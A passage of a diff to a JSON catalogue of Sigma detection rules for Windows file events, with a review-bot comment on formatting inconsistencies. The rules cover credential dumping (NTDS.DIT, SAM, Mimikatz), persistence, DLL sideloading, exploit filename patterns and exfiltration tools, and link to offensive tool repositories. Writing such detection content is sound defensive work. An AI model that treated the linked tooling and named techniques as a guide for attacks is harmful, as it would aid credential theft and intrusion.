- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_new_src_file.yml"
- ],
- "tags": [
- "attack.t1218.011",
- "attack.defense_evasion"
- ]
- },
- "uuid": "c048f047-7e2a-4888-b302-55f509d4a91d",
- "value": "SCR File Write Event"
- },
- {
- "description": "Detects creation of new \".dll\" files inside the plugins directory of a notepad++ installation by a process other than \"gup.exe\". Which could indicates possible persistence",
- "meta": {
- "author": "Nasreddine Bencherchali",
- "creation_date": "2022/06/10",
- "falsepositive": [
- "Possible FPs during first installation of Notepad++",
- "Legitimate use of custom plugins to enhance notepad++ functionality by users"
- ],
- "filename": "file_event_win_notepad_plus_plus_persistence.yml",
- "level": "medium",
- "logsource.category": "file_event",
- "logsource.product": "windows",
- "refs": [
- "https://pentestlab.blog/2022/02/14/persistence-notepad-plugins/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_notepad_plus_plus_persistence.yml"
- ],
- "tags": [
- "attack.persistence"
- ]
- },
- "uuid": "54127bd4-f541-4ac3-afdb-ea073f63f692",
- "value": "Persistence Via Notepad++ Plugins"
- },
- {
- "description": "Detects suspicious creations of a file named ntds.dit, e.g. by a PowerShell parent or in a suspicious directory or a suspicious one liner",
- "meta": {
- "author": "Florian Roth",
- "creation_date": "2022/03/11",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "file_event_win_ntds_dit.yml",
- "level": "high",
- "logsource.category": "file_event",
- "logsource.product": "windows",
- "refs": [
- "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration",
- "https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/",
- "https://pentestlab.blog/tag/ntds-dit/",
- "https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Gather/Copy-VSS.ps1",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_ntds_dit.yml"
- ],
- "tags": [
- "attack.credential_access",
- "attack.t1003.003"
- ]
- },
- "uuid": "4e7050dd-e548-483f-b7d6-527ab4fa784d",
- "value": "Suspicious NTDS.DIT Creation"
- },
- {
- "description": "Detects suspicious creations of files with names used in various tools that export the NTDS.DIT for exfiltration",
- "meta": {
- "author": "Florian Roth",
- "creation_date": "2022/03/11",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "file_event_win_ntds_exfil_tools.yml",
- "level": "high",
- "logsource.category": "file_event",
- "logsource.product": "windows",
- "refs": [
- "https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/modules/post/windows/gather/ntds_grabber.rb",
- "https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/data/post/powershell/NTDSgrab.ps1",
- "https://github.com/SecureAuthCorp/impacket/blob/7d2991d78836b376452ca58b3d14daa61b67cb40/impacket/examples/secretsdump.py#L2405",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_ntds_exfil_tools.yml"
- ],
- "tags": [
- "attack.credential_access",
- "attack.t1003.003"
- ]
- },
- "uuid": "3a8da4e0-36c1-40d2-8b29-b3e890d5172a",
- "value": "Suspicious NTDS Exfil Filename Patterns"
+ "uuid": "002bdb95-0cf1-46a6-9e08-d38c128a6127",
+ "value": "WScript or CScript Dropper - File"
 },
 {
 "description": "Detects add-ins that load when Microsoft Word or Excel starts (.wll/.xll are simply .dll fit for Word or Excel).",
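Review bot: The added `"tags": "No established tags"` line gives the `tags` key a string value while every other entry in this hunk carries `tags` as an array, so a consumer that iterates the field gets a sequence of characters for this rule instead of zero tags; emit `"tags": []` (or omit the key) when the generator finds none, and the same applies wherever the file uses the string sentinels `"No established tags"` and `"No established falsepositives"`. The first element of the new entry's `refs`, `"WScript or CScript Dropper (cea72823-df4d-4567-950c-0b579eaf0846)"`, is a rule title with its Sigma id rather than a link, which looks like a Sigma `related` entry flattened into a URL list; the galaxy format's `related` list with `dest-uuid` would carry that cross-reference without mixing URL and non-URL strings in `refs`. The enclosing cluster array starts and ends outside the hunk.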
@@ -23543,482 +24666,316 @@ "value": "Outlook C2 Macro Creation" }, { - "description": "Detects the creation of new Outlook form which can contain malicious code", - "meta": { - "author": "Tobias Michalski", - "creation_date": "2021/06/10", - "falsepositive": [ - "Unknown" - ], - "filename": "file_event_win_outlook_newform.yml", - "level": "high", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/blueteamsec1/status/1401290874202382336?s=20", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_outlook_newform.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1137.003" - ] - }, - "uuid": "c3edc6a5-d9d4-48d8-930e-aab518390917", - "value": "Outlook Form Installation" - }, - { - "description": "Detects processes creating temp files related to PCRE.NET package", - "meta": { - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "creation_date": "2020/10/29", - "falsepositive": [ - "Unknown" - ], - "filename": "file_event_win_pcre_net_temp_file.yml", - "level": "high", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/rbmaslen/status/1321859647091970051", - "https://twitter.com/tifkin_/status/1321916444557365248", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_pcre_net_temp_file.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059" - ] - }, - "uuid": "6e90ae7a-7cd3-473f-a035-4ebb72d961da", - "value": "PCRE.NET Package Temp Files" - }, - { - "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", - "meta": { - "author": "Bhabesh Raj", - "creation_date": "2021/05/05", - "falsepositive": [ - "Very unlikely" - ], - "filename": "file_event_win_pingback_backdoor.yml", - "level": "high", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - 
"https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/backdoor-at-the-end-of-the-icmp-tunnel", - "https://app.any.run/tasks/4a54c651-b70b-4b72-84d7-f34d301d6406", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_pingback_backdoor.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1574.001" - ] - }, - "uuid": "2bd63d53-84d4-4210-80ff-bf0658f1bf78", - "value": "Pingback Backdoor - File" - }, - { - "description": "Detects the creation of known powershell scripts for exploitation", - "meta": { - "author": "Markus Neis, Nasreddine Bencherchali, Mustafa Kaan Demir, Georg Lauenstein", - "creation_date": "2018/04/07", - "falsepositive": [ - "Unknown" - ], - "filename": "file_event_win_powershell_exploit_scripts.yml", - "level": "high", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://raw.githubusercontent.com/Neo23x0/sigma/f35c50049fa896dff91ff545cb199319172701e8/rules/windows/powershell/powershell_malicious_commandlets.yml", - "https://github.com/PowerShellMafia/PowerSploit", - "https://github.com/NetSPI/PowerUpSQL", - "https://github.com/CsEnox/EventViewer-UACBypass", - "https://github.com/AlsidOfficial/WSUSpendu/", - "https://github.com/nettitude/Invoke-PowerThIEf", - "https://github.com/S3cur3Th1sSh1t/WinPwn", - "https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries", - "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1", - "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1", - "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1", - "https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1", - "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/", - 
"https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_powershell_exploit_scripts.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "f331aa1f-8c53-4fc3-b083-cc159bc971cb", - "value": "Malicious PowerShell Commandlet Names" - }, - { - "description": "Attempts to detect PowerShell writing startup shortcuts.\nThis procedure was highlighted in Red Canary Intel Insights Oct. 2021, \"We frequently observe adversaries using PowerShell to write malicious .lnk files into the startup directory to establish persistence.\nAccordingly, this detection opportunity is likely to identify persistence mechanisms in multiple threats.\nIn the context of Yellow Cockatoo, this persistence mechanism eventually launches the command-line script that leads to the installation of a malicious DLL\"\n", - "meta": { - "author": "Christopher Peacock '@securepeacock', SCYTHE", - "creation_date": "2021/10/24", - "falsepositive": [ - "Unknown", - "Depending on your environment accepted applications may leverage this at times. It is recommended to search for anomalies inidicative of malware." 
- ], - "filename": "file_event_win_powershell_startup_shortcuts.yml", - "level": "high", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://redcanary.com/blog/intelligence-insights-october-2021/", - "https://github.com/redcanaryco/atomic-red-team/blob/36d49de4c8b00bf36054294b4a1fcbab3917d7c5/atomics/T1547.001/T1547.001.md#atomic-test-7---add-executable-shortcut-link-to-user-startup-folder", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_powershell_startup_shortcuts.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001" - ] - }, - "uuid": "92fa78e7-4d39-45f1-91a3-8b23f3f1088d", - "value": "PowerShell Writing Startup Shortcuts" - }, - { - "description": "Detects a dump file written by QuarksPwDump password dumper", - "meta": { - "author": "Florian Roth", - "creation_date": "2018/02/10", - "falsepositive": [ - "Unknown" - ], - "filename": "file_event_win_quarkspw_filedump.yml", - "level": "critical", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://jpcertcc.github.io/ToolAnalysisResultSheet/details/QuarksPWDump.htm", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_quarkspw_filedump.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.002" - ] - }, - "uuid": "847def9e-924d-4e90-b7c4-5f581395a2b4", - "value": "QuarksPwDump Dump File" - }, - { - "description": "Detects Rclone config file being created", - "meta": { - "author": "Aaron Greetham (@beardofbinary) - NCC Group", - "creation_date": "2021/05/26", - "falsepositive": [ - "Legitimate Rclone usage (rare)" - ], - "filename": "file_event_win_rclone_exec_file.yml", - "level": "high", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_rclone_exec_file.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1567.002" - ] - }, - "uuid": "34986307-b7f4-49be-92f3-e7a4d01ac5db", - "value": "Rclone Config File Creation" - }, - { - "description": "Detects actions caused by the RedMimicry Winnti playbook", - "meta": { - "author": "Alexander Rausch", - "creation_date": "2020/06/24", - "falsepositive": [ - "Unknown" - ], - "filename": "file_event_win_redmimicry_winnti_filedrop.yml", - "level": "high", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://redmimicry.com", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_redmimicry_winnti_filedrop.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027" - ] - }, - "uuid": "130c9e58-28ac-4f83-8574-0a4cc913b97e", - "value": "RedMimicry Winnti Playbook Dropped File" - }, - { - "description": "Detects default filenames output from the execution of CrackMapExec and Impacket-secretsdump against an endpoint.", - "meta": { - "author": "SecurityAura", - "creation_date": "2022/11/16", - "falsepositive": [ - "Unknown" - ], - "filename": "file_event_win_remote_cred_dump.yml", - "level": "high", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://github.com/Porchetta-Industries/CrackMapExec", - "https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_remote_cred_dump.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003" - ] - }, - "uuid": "6e2a900a-ced9-4e4a-a9c2-13e706f9518a", - "value": "Remote Credential Dump" - }, - { - "description": "Detects a phishing attack which expands a ZIP file containing a malicious shortcut. 
If the victim expands the ZIP file via the explorer process, then the explorer process expands the malicious ZIP file and drops a malicious shortcut redirected to a backdoor into the Startup folder. Additionally, the file name of the malicious shortcut in Startup folder contains {0AFACED1-E828-11D1-9187-B532F1E9575D} meaning the folder shortcut operation.", - "meta": { - "author": "Greg (rule)", - "creation_date": "2022/07/21", - "falsepositive": "No established falsepositives", - "filename": "file_event_win_ripzip_attack.yml", - "level": "high", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/jonasLyk/status/1549338335243534336?t=CrmPocBGLbDyE4p6zTX1cg&s=19", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_ripzip_attack.yml" - ], - "tags": [ - "attack.t1547", - "attack.persistence" - ] - }, - "uuid": "a6976974-ea6f-4e97-818e-ea08625c52cb", - "value": "RipZip Attack on Startup Folder" - }, - { - "description": "Detects the creation of files that look like exports of the local SAM (Security Account Manager)", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/02/11", - "falsepositive": [ - "Rare cases of administrative activity" - ], - "filename": "file_event_win_sam_dump.yml", - "level": "high", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://github.com/search?q=CVE-2021-36934", - "https://github.com/cube0x0/CVE-2021-36934", - "https://www.google.com/search?q=%22reg.exe+save%22+sam", - "https://github.com/HuskyHacks/ShadowSteal", - "https://github.com/FireFart/hivenightmare", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_sam_dump.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.002" - ] - }, - "uuid": "4e87b8e2-2ee9-4b2a-a715-4727d297ece0", - "value": "SAM Dump File Creation" - }, - { - "description": "An adversary may use legitimate 
desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "description": "Detect creation of suspicious executable file name. Some strings look for suspicious file extensions, others look for filenames that exploit unquoted service paths.", "meta": { "author": "frack113", - "creation_date": "2022/02/13", - "falsepositive": [ - "Legitimate use" - ], - "filename": "file_event_win_screenconnect_artefact.yml", - "level": "medium", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-5---screenconnect-application-download-and-install-on-windows", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_screenconnect_artefact.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1219" - ] - }, - "uuid": "fec96f39-988b-4586-b746-b93d59fd1922", - "value": "ScreenConnect Temporary Installation Artefact" - }, - { - "description": "This rule will monitor executable and script file creation by office applications. 
Please add more file extensions or magic bytes to the logic of your choice.", - "meta": { - "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)", - "creation_date": "2021/08/23", + "creation_date": "2022/09/05", "falsepositive": [ "Unknown" ], - "filename": "file_event_win_script_creation_by_office_using_file_ext.yml", + "filename": "file_event_win_susp_executable_creation.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", - "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_script_creation_by_office_using_file_ext.yml" - ], - "tags": [ - "attack.t1204.002", - "attack.execution" - ] - }, - "uuid": "c7a74c80-ba5a-486e-9974-ab9e682bc5e4", - "value": "Created Files by Office Applications" - }, - { - "description": "Detects a Windows executable that writes files to suspicious folders", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/11/20", - "falsepositive": [ - "Unknown" - ], - "filename": "file_event_win_shell_write_susp_directory.yml", - "level": "high", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "Internal Research", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_shell_write_susp_directory.yml" - ], - "tags": "No established tags" - }, - "uuid": "1277f594-a7d1-4f28-a2d3-73af5cbeab43", - "value": "Windows Shell File Write to Suspicious Folder" - }, - { - "description": "Detects windows executables that writes files with suspicious extensions", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/12", - "falsepositive": [ - "Unknown" - ], - "filename": 
"file_event_win_shell_write_susp_files_extensions.yml", - "level": "high", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "Internal Research", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_shell_write_susp_files_extensions.yml" - ], - "tags": "No established tags" - }, - "uuid": "b8fd0e93-ff58-4cbd-8f48-1c114e342e62", - "value": "Windows Binaries Write Suspicious Extensions" - }, - { - "description": "A General detection for files being created in the Windows startup directory. This could be an indicator of persistence.", - "meta": { - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "creation_date": "2020/05/02", - "falsepositive": [ - "An FP could be caused by legitimate application writing shortcuts for example. This folder should always be inspected to make sure that all the files in there are legitimate" - ], - "filename": "file_event_win_startup_folder_file_write.yml", - "level": "medium", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://github.com/OTRF/detection-hackathon-apt29/issues/12", - "https://threathunterplaybook.com/evals/apt29/detections/5.B.1_611FCA99-97D0-4873-9E51-1C1BA2DBB40D.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_startup_folder_file_write.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001" - ] - }, - "uuid": "2aa0a6b4-a865-495b-ab51-c28249537b75", - "value": "Startup Folder File Write" - }, - { - "description": "Detects the usage of ADSI (LDAP) operations by tools. This may also detect tools like LDAPFragger.", - "meta": { - "author": "xknow @xknow_infosec, Tim Shelton", - "creation_date": "2019/03/24", - "falsepositive": [ - "Other legimate tools, which do ADSI (LDAP) operations, e.g. any remoting activity by MMC, Powershell, Windows etc." 
- ], - "filename": "file_event_win_susp_adsi_cache_usage.yml", - "level": "high", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://medium.com/@ivecodoe/detecting-ldapfragger-a-newly-released-cobalt-strike-beacon-using-ldap-for-c2-communication-c274a7f00961", - "https://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes/", - "https://github.com/fox-it/LDAPFragger", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_adsi_cache_usage.yml" - ], - "tags": [ - "attack.t1001.003", - "attack.command_and_control" - ] - }, - "uuid": "75bf09fa-1dd7-4d18-9af9-dd9e492562eb", - "value": "Suspicious ADSI-Cache Usage By Unknown Tool" - }, - { - "description": "Detects suspicious .NET assembly executions. Could detect using Cobalt Strike's command execute-assembly.", - "meta": { - "author": "omkar72, oscd.community, Wojciech Lesicki", - "creation_date": "2020/10/12", - "falsepositive": [ - "Rundll32.exe with zzzzInvokeManagedCustomActionOutOfProc in command line and msiexec.exe as parent process - https://twitter.com/SBousseaden/status/1388064061087260675" - ], - "filename": "file_event_win_susp_clr_logs.yml", - "level": "high", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://blog.menasec.net/2019/07/interesting-difr-traces-of-net-clr.html", - "https://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/", - "https://github.com/olafhartong/sysmon-modular/blob/5e5f6d90819a7f35eec0aba08021d0d201bb9055/11_file_create/include_dotnet.xml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_clr_logs.yml" - ], - "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1059.001", - "attack.t1218" - ] - }, - "uuid": "e4b63079-6198-405c-abd7-3fe8b0ce3263", - "value": "Suspicious CLR Logs Creation" - }, - { - "description": 
"Once executed, colorcpl.exe will copy the arbitrary file to c:\\windows\\system32\\spool\\drivers\\color\\", - "meta": { - "author": "frack113", - "creation_date": "2022/01/21", - "falsepositive": [ - "Unknown" - ], - "filename": "file_event_win_susp_colorcpl.yml", - "level": "high", - "logsource.category": "file_event", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/eral4m/status/1480468728324231172?s=20", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_colorcpl.yml" + "https://app.any.run/tasks/76c69e2d-01e8-49d9-9aea-fb7cc0c4d3ad/", + "https://medium.com/@SumitVerma101/windows-privilege-escalation-part-1-unquoted-service-path-c7a011a8d8ae", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_executable_creation.yml" ], "tags": [ "attack.defense_evasion", "attack.t1564" ] }, - "uuid": "e15b518d-b4ce-4410-a9cd-501f23ce4a18", - "value": "Suspicious Creation with Colorcpl" + "uuid": "74babdd6-a758-4549-9632-26535279e654", + "value": "Suspicious Executable File Creation" + }, + { + "description": "Detects the default filename used in PoC code against print spooler vulnerability CVE-2021-1675", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/06/29", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_cve_2021_1675_printspooler.yml", + "level": "critical", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/hhlxf/PrintNightmare", + "https://github.com/cube0x0/CVE-2021-1675", + "https://github.com/afwu/PrintNightmare", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cve_2021_1675_printspooler.yml" + ], + "tags": [ + "attack.execution", + "attack.privilege_escalation", + "attack.resource_development", + "attack.t1587", + "cve.2021.1675" + ] + }, + "uuid": "2131cfb3-8c12-45e8-8fa0-31f5924e9f07", + "value": "CVE-2021-1675 
Print Spooler Exploitation Filename Pattern" + }, + { + "description": "Detects Mimikatz MemSSP default log file creation", + "meta": { + "author": "David ANDRE", + "creation_date": "2021/12/20", + "falsepositive": [ + "Unlikely" + ], + "filename": "file_event_win_mimikatz_memssp_log_file.yml", + "level": "critical", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://pentestlab.blog/2019/10/21/persistence-security-support-provider/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_mimikatz_memssp_log_file.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003" + ] + }, + "uuid": "034affe8-6170-11ec-844f-0f78aa0c4d66", + "value": "Mimikatz MemSSP Default Log File Creation" + }, + { + "description": "Detects creation of a malicious DLL file in the location where the OneDrive or Team applications\nUpon execution of the Teams or OneDrive application, the dropped malicious DLL file (“iphlpapi.dll”) is sideloaded\n", + "meta": { + "author": "frack113", + "creation_date": "2022/08/12", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_iphlpapi_dll_sideloading.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_iphlpapi_dll_sideloading.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1574.002" + ] + }, + "uuid": "1908fcc1-1b92-4272-8214-0fbaf2fa5163", + "value": "Malicious DLL File Dropped in the Teams or OneDrive Folder" + }, + { + "description": "Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum", + "meta": { + "author": "Sittikorn S", + 
"creation_date": "2021/07/16", + "falsepositive": [ + "Unlikely" + ], + "filename": "file_event_win_cve_2021_31979_cve_2021_33771_exploits.yml", + "level": "critical", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/", + "https://citizenlab.ca/2021/07/hooking-candiru-another-mercenary-spyware-vendor-comes-into-focus/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cve_2021_31979_cve_2021_33771_exploits.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1566", + "attack.t1203", + "cve.2021.33771", + "cve.2021.31979" + ] + }, + "uuid": "ad7085ac-92e4-4b76-8ce2-276d2c0e68ef", + "value": "CVE-2021-31979 CVE-2021-33771 Exploits by Sourgum" + }, + { + "description": "Detects creation of a file named \"wpbbin\" in the \"%systemroot%\\system32\\\" directory. 
Which could be indicative of UEFI based persistence method", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/18", + "falsepositive": [ + "Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)" + ], + "filename": "file_event_win_wpbbin_persistence.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://persistence-info.github.io/Data/wpbbin.html", + "https://grzegorztworek.medium.com/using-uefi-to-inject-executable-files-into-bitlocker-protected-drives-8ff4ca59c94c", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_wpbbin_persistence.yml" + ], + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.t1542.001" + ] + }, + "uuid": "e94b9ddc-eec5-4bb8-8a58-b9dc5f4e185f", + "value": "UEFI Persistence Via Wpbbin - FileCreation" + }, + { + "description": "Detects the creation of log files during a TeamViewer remote session", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/01/30", + "falsepositive": [ + "Legitimate uses of TeamViewer in an organisation" + ], + "filename": "file_event_win_susp_teamviewer_remote_session.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://www.teamviewer.com/en-us/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_teamviewer_remote_session.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ] + }, + "uuid": "162ab1e4-6874-4564-853c-53ec3ab8be01", + "value": "TeamViewer Remote Session" + }, + { + "description": "Detects default file names outputted by the BloodHound collection tool SharpHound", + "meta": { + "author": "C.J. 
May", + "creation_date": "2022/08/09", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_bloodhound_collection.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://academy.hackthebox.com/course/preview/active-directory-bloodhound/bloodhound--data-collection", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_bloodhound_collection.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1087.001", + "attack.t1087.002", + "attack.t1482", + "attack.t1069.001", + "attack.t1069.002", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "02773bed-83bf-469f-b7ff-e676e7d78bab", + "value": "BloodHound Collection Files" + }, + { + "description": "Detects WerFault copoed to a suspicious folder, which could be a sign of WerFault DLL hijacking", + "meta": { + "author": "frack113", + "creation_date": "2022/05/09", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_werfault_dll_hijacking.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://www.bleepingcomputer.com/news/security/hackers-are-now-hiding-malware-in-windows-event-logs/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_werfault_dll_hijacking.yml" + ], + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.t1574.001" + ] + }, + "uuid": "28a452f3-786c-4fd8-b8f2-bddbe9d616d1", + "value": "Creation of an WerFault.exe in Unusual Folder" + }, + { + "description": "Detects creation of template files for Microsoft Office from outside Office", + "meta": { + "author": "Max Altgelt", + "creation_date": "2022/06/02", + "falsepositive": [ + "Loading a user environment from a backup or a domain controller", + "Synchronization of templates" + ], + "filename": "file_event_win_word_template_creation.yml", + "level": "high", + "logsource.category": 
"file_event", + "logsource.product": "windows", + "refs": [ + "https://insight-jp.nttsecurity.com/post/102hojk/operation-restylink-apt-campaign-targeting-japanese-companies", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_word_template_creation.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1137" + ] + }, + "uuid": "0e20c89d-2264-44ae-8238-aeeaba609ece", + "value": "Office Template Creation" + }, + { + "description": "Detects Octopus Scanner Malware.", + "meta": { + "author": "NVISO", + "creation_date": "2020/06/09", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_mal_octopus_scanner.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://securitylab.github.com/research/octopus-scanner-malware-open-source-supply-chain", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_mal_octopus_scanner.yml" + ], + "tags": [ + "attack.t1195", + "attack.t1195.001" + ] + }, + "uuid": "805c55d9-31e6-4846-9878-c34c75054fe9", + "value": "Octopus Scanner Malware" + }, + { + "description": "Detects the presence and execution of 